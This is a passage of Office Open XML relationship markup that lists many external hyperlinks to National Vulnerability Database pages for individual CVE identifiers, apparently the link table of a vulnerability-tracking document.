Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97595" TargetMode="External" Id="rId160" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97990" TargetMode="External" Id="rId161" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98050" TargetMode="External" Id="rId162" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98056" TargetMode="External" Id="rId163" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98108" TargetMode="External" Id="rId164" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100390" TargetMode="External" Id="rId165" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98096" TargetMode="External" Id="rId166" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100310" TargetMode="External" Id="rId167" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100530" TargetMode="External" Id="rId168" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93901" TargetMode="External" Id="rId169" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97865" TargetMode="External" Id="rId170" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97871" TargetMode="External" Id="rId171" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97882" TargetMode="External" Id="rId172" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97883" TargetMode="External" Id="rId173" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97885" TargetMode="External" Id="rId174" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100372" TargetMode="External" Id="rId175" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33639" TargetMode="External" Id="rId176" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42323" TargetMode="External" Id="rId177" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42324" TargetMode="External" Id="rId178" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83591" TargetMode="External" Id="rId179" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84279" TargetMode="External" Id="rId180" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84280" TargetMode="External" Id="rId181" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84281" TargetMode="External" Id="rId182" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84862" TargetMode="External" Id="rId183" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85750" TargetMode="External" Id="rId184" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93303" TargetMode="External" Id="rId185" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93654" TargetMode="External" Id="rId186" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94573" TargetMode="External" Id="rId187" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95864" TargetMode="External" Id="rId188" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95866" TargetMode="External" Id="rId189" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96039" TargetMode="External" Id="rId190" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96568" TargetMode="External" Id="rId191" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96752" TargetMode="External" Id="rId192" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97060" TargetMode="External" Id="rId193" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100555" TargetMode="External" Id="rId194" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100598" TargetMode="External" Id="rId195" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53626" TargetMode="External" Id="rId196" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53629" TargetMode="External" Id="rId197" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56723" TargetMode="External" Id="rId198" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56724" TargetMode="External" Id="rId199" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56727" TargetMode="External" Id="rId200" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57449" TargetMode="External" Id="rId201" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67408" TargetMode="External" Id="rId202" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67419" TargetMode="External" Id="rId203" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84464" TargetMode="External" Id="rId204" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84465" TargetMode="External" Id="rId205" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93306" TargetMode="External" Id="rId206" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93365" TargetMode="External" Id="rId207" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100419" TargetMode="External" Id="rId208" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100504" TargetMode="External" Id="rId209" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97589" TargetMode="External" Id="rId210" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97608" TargetMode="External" Id="rId211" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97609" TargetMode="External" Id="rId212" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97926" TargetMode="External" Id="rId213" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97931" TargetMode="External" Id="rId214" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97953" TargetMode="External" Id="rId215" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98027" TargetMode="External" Id="rId216" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98029" TargetMode="External" Id="rId217" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98030" TargetMode="External" Id="rId218" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98041" TargetMode="External" Id="rId219" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98083" TargetMode="External" Id="rId220" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98150" TargetMode="External" Id="rId221" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98154" TargetMode="External" Id="rId222" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100187" TargetMode="External" Id="rId223" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100377" TargetMode="External" Id="rId224" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17545" TargetMode="External" Id="rId225" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63207" TargetMode="External" Id="rId226" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67226" TargetMode="External" Id="rId227" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84461" TargetMode="External" Id="rId228" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96875" TargetMode="External" Id="rId229" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96876" TargetMode="External" Id="rId230" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96877" TargetMode="External" Id="rId231" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96878" TargetMode="External" Id="rId232" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96879" TargetMode="External" Id="rId233" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100540" TargetMode="External" Id="rId234" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80431" TargetMode="External" Id="rId235" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97846" TargetMode="External" Id="rId236" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100584" TargetMode="External" Id="rId237" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96448" TargetMode="External" Id="rId238" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14181" TargetMode="External" Id="rId239" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100192" TargetMode="External" Id="rId240" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100501" TargetMode="External" Id="rId241" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100531" TargetMode="External" Id="rId242" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100536" TargetMode="External" Id="rId243" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100538" TargetMode="External" Id="rId244" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100566" TargetMode="External" Id="rId245" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100582" TargetMode="External" Id="rId246" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100594" TargetMode="External" Id="rId247" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100595" TargetMode="External" Id="rId248" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63431" TargetMode="External" Id="rId249" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63432" TargetMode="External" Id="rId250" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85274" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85289" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85291" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91767" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91768" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92573" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93030" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93899" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100529" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100546" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13179" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15273" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92746" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93656" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93747" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93897" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94376" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96766" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100177" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100190" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100556" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100577" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100591" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100592" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61837" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67223" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67225" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67230" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67242" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84463" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97863" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97886" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97895" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100237" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100521" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100522" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100523" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17577" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18311" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18312" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18320" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78393" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78902" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88996" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92212" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53627" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54790" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66071" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66073" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67411" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67412" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67413" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80432" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100574" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53628" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67222" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67227" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67415" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86066" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91766" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92842" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93477" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93682" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95835" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100547" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100569" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100581" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12037" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97222" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97877" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97878" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97879" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100303" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100388" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100524" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 